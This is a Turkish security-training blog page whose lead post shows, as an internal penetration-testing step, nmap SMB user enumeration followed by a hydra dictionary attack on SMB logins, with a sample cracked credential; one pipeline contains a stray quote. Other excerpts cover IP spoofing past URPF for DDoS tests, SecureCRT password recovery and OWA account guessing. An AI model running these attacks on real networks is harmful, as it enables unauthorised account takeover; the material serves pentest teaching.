İç Ağda Kullanıcı Hesaplarını Belirleme

Pazartesi, 16 Oca 2012 yorum yok

İç ağ testlerinde gerçekleştilen testlerden bir tanesi de ağda ilgili kullanıcı isimlerinin belirlenmesi olmaktadır. Bu işlem Nmap ile gerçekleştirilebilmektedir. 192.168.1.0 ağı için bu adımın gerçekleştirilmesi aşağıdaki şekilde olmaktadır.

Öncelikle aktif ip adreslerinin tespit edilmesi gerekmektedi, bunun için;

# nmap -p139,445 -n 192.168.1.1-254 --open | grep  -B3 "open" | grep -E 
"[0-9]+\.[0-9]+\.[0-9]+\." | awk '{print $5}' > ipler.txt
# nmap -p139,445 -n 192.168.1.1-254 --script=smb-enum-users
-iL ipler.txt > nmap-users.txt

Bu işlemlerin ardından dosya içerisinden kullanıcı isimleri  temin edilmelidir.

# cat nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d
"\\" -f2 |cut -d"(" -f1 |sed 's/.$//'|sed -e 's/\(.* \)/\L\1/' " sort -rn | uniq > usernames.txt

Görüldüğü gibi kullanıcı isimleri ve aktif olan ip adresleri tespit edilmektedir. Bundan sonraki adım sözlük saldırısı ile bu kullanıcıların parola bilgilerinin elde edilmesi olacaktır. Bunun için hydra veya alternatif yazılımlar kullanılabilir. Hydra ile bu işlem aşağıdaki şekilde gerçekleştirilmektedir.

# hydra -M ipler.txt smbnt -s445 -L usernames.txt -P
passwd_file.txt -t1 -e n -m D > sonuc.txt

passwd_file.txt dosyası sözlük saldırısı için kullanılacak olan sözlüğü belirtmektedir. sonuc.txt dosyası içerisinden başarılı olan denemeler aşağıdaki gibi görülmektedir.

# cat sonuc.txt  | grep "\[smb\]" | awk '{print $3,$5,$7}'
192.168.1.37 ahmet.mehmet test37

Görüldüğü gibi başarılı olarak sonuçlanan kullanıcı adı/parola bilgisi yukarıdaki gibi olmaktadır.

Ömer ALBAYRAK

İlgili diğer yazılar:

Siber Güvenlik Konferansı ’11 Sunumları

Çarşamba, 11 Oca 2012 2 yorum

2011 Yılı Siber Tehditler Araştırması Sonucu

Pazartesi, 09 Oca 2012 yorum yok

Bilgi Güvenliği AKADEMİSİ tarafından 200 farklı firmanın katılımıyla gerçekleştirilen “2011 Yılı Siber Tehditler Araştırması Anketi” sonuçlanmıştır. Ankete katılan tüm firmalara teşekkür ederiz.

Sonuçlara göre Kötücül yazılım bulaşması problemi listenin başını çekmekte ve yine buna bağlı bir madde olan DDoS Saldırıları ikinci sırada yer almaktadır.

İç çalışan tehditi ve veri sızdırma problemi de 2011 yılında artış gösteren anket maddelerinden biri olarak göze çarpmaktadır.

 

devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

Hping Kullanarak URPF Korumalı Ağlarda IP Spoofing

Pazar, 08 Oca 2012 yorum yok

URPF(Unicast Reverse Path Forwarding) ağ ve güvenlik cihazlarında IP spoofing’le mücadele etmek için kullanılan bir özelliktir.

Basitce URPF paketin kaynak ip adresinin yonlendirme tablosu ile karsilastirilmasi sonucu paketin uygun arabirimden gelip gelmediginin kontrol eder. URPF, internetten gelecek paketler için değil, güvenlik/network cihazı tarafından korunan sistemler için geçerlidir.

DDoS testleri gerçekleştirilirken genellikle test yapılan ağın çıkışındaki bir ağ/güvenlik cihazı üretilen sahte ip paketlerini URPF’den (ya da benzeri bir özellikten) dolayı engelliyor olabilir. Bu gibi durumlarda DDoS testlerinde üretilen paketler internete çıkamayacağı için hedef sisteme etkisi olmayacaktır. Bu gibi ortamlarda gönderilecek paketler kullanılan sistemle aynı subnetten üretilirse (mesela DDoS testi icin kullanılan sistemin ip adresi 192.168.1.3/24 olsun, burada 192.168.1.0/24 subnetinden rastgele ip kullanılabilir) URPF’e takılmadan hedef sisteme erişecektir. devamını oku…

İlgili diğer yazılar:

Bilgi Güvenliği AKADEMİSİ 2012 Yılı Eğitim Takvimi

Pazartesi, 02 Oca 2012 yorum yok

BGA(Bilgi Güvenliği AKADEMİSİ) 2012 yılı ilk yarı eğitim takvimimiz netleşmiştir. Detay bilgi edinmek isteyenler http://www.bga.com.tr/bilgi-guvenligi-akademisi-2012-yili-egitim-takvimi/ adresini ziyaret edebilir. Eğitim takviminde özel sınıf eğitimlere öncelik verdiğimiz için bazı eğitimler şimdiden kapanmış durumdadır.

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:
Categories: Duyurular Tags:

[İpucu] Kaydedilmiş SecureCRT Parolalarını Bulma

Salı, 20 Ara 2011 yorum yok

SecureCRT, yaygın kullanıma sahip  kolay kullanımlı uzaktan erişim, yönetim, dosya transferi ve  tünelleme imkanı veren ticari bir yazılımdır. Özellikle SSH sunuculara yapılan bağlantılarda tablı bir yapı sunması ve isteğe göre hedef sistemlerin parolalarını “şifreli” bir şekilde disk üzerinde barındırarak her bağlantıda parolayı tekrar sormaması UNIX/Linux adminlerin sık tercih ettiği özelliklerdendir.

 SecureCRT’e Kaydedilmiş Ama Hatırlanamayan Parolaların Bulunması devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

Beyaz Şapkalı Hacker(C.E.H v7) Eğitimi (İstanbul)

Pazartesi, 19 Ara 2011 yorum yok

Eğitim Tanımı

Beyaz Şapkalı Hacker eğitimi hackerların sistemlere sızmada kullandığı yöntemleri ve araçları detaylı ve uygulamalı bir şekilde anlatılarak proaktif güvenlik anlayışı kazandırma amaçlı bir eğitimdir. Benzeri eğitimlerden farkı eğitim içeriğinde gerçek dünyaya uygun uygulamaların kullanılması ve pratiğe önem verilmesidir.

Beyaz şapkalı hacker eğitimi Ec-Council Certified Ethical Hacker v7 ile uyumludur.

Eğitim sonunda CEH sertifika sınavına girecek katılımcılarımıza 150$’lık indirim imkanı sunulmaktadır. devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme Sunumu

Pazar, 18 Ara 2011 yorum yok

IV. Ağ ve Bilgi Güvenliği Sempozyumu kapsamında Huzeyfe ÖNAL tarafından gerçekleştirilen “Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme”  konulu konuşmaya ait sunum dosyası Bilgi Güvenliği AKADEMİSİ belge deposuna eklenmiştir. İlgilenenler
http://www.bga.com.tr/calismalar/computer_forensic101.pdf adresinden sunumu indirebilir.

İlgili diğer yazılar:

Pentest Çalışmalarında OWA(Outlook Web Access) Hesaplarını Bulma

Pazar, 18 Ara 2011 yorum yok

Microsoft OWA(Outlook Web Access) kurumsal ortamlarda en fazla tercih edilen webmail uygulaması olarak karşımıza çıkmaktadır. Günümüz iş dünyasının en temel iletişim araçlarından birinin e-posta(mail olduğu düşünülürse dışarı açık OWA sistemlerinin büyük risk taşıdığı aşikardır.

Ele geçirilecek bir mail hesabı sadece sahibinin güvenliğini değil şirketin güvenliğini de tehlikeye atmaktadır. Basit mantıkla düşünülecek olursa ele geçirilmiş bir meil hesabı  üzerinden hem sosyal mühendislik saldırıları hem de şirket çalışanlarının tüm özlük bilgileri sızdırılabilir.

Bu nedenle pentest çalışmalarında e-posta hesaplarının tahmin yöntemiyle ele geçirilmesi adımı önemli rol oynamaktadır.  devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

pfSense Güvenlik Duvarı Eğitimi (Ankara-İstanbul)

Salı, 13 Ara 2011 yorum yok

Eğitim Açıklaması

FreeBSD/OpenBSD işletim sistemi ve işletim sistemi ile birlikte gelen Packet Filter(PF) Güvenlik duvarı yazılımını temel alarak geliştirilmiş açık kod güvenlik duvarı pfSense’in etkin kullanımı anlatan eğitim.

Eğitim, aşağıdaki tüm konu başlıklarını detayları ile uygulamalı olarak içermektedir. Eğitim içeriğinde, pfSense firewall ile 5651 sayılı kanun hükmünlerine göre yer sağlayıcılara, erişim sağlayıcılar ve içerik sağlayıcılara yönelik kayıt tutma ve elektronik zaman damgası ile imzalama işlemleride uygulamalı olarak yer almaktadır.

pfSense 2.0 eğitimi, firewall geliştiricilerine ve firewall ürünleri satmaya yönelik firmalarada hitap etmektedir.

Eğitim Tarihleri 
Ankara:15-17 Şubat 2012

İstanbul:27-29 Ocak 2012

Eğitim Adresi

Ankara: İller Sok. No:4 Mebusevleri / Tandoğan / ANKARA (Gençlik Cad. Anıtkabir yanı)

İstanbul: Sırma Perde Sokak No:17/5  Altunizade-Üsküdar-İstanbul devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı: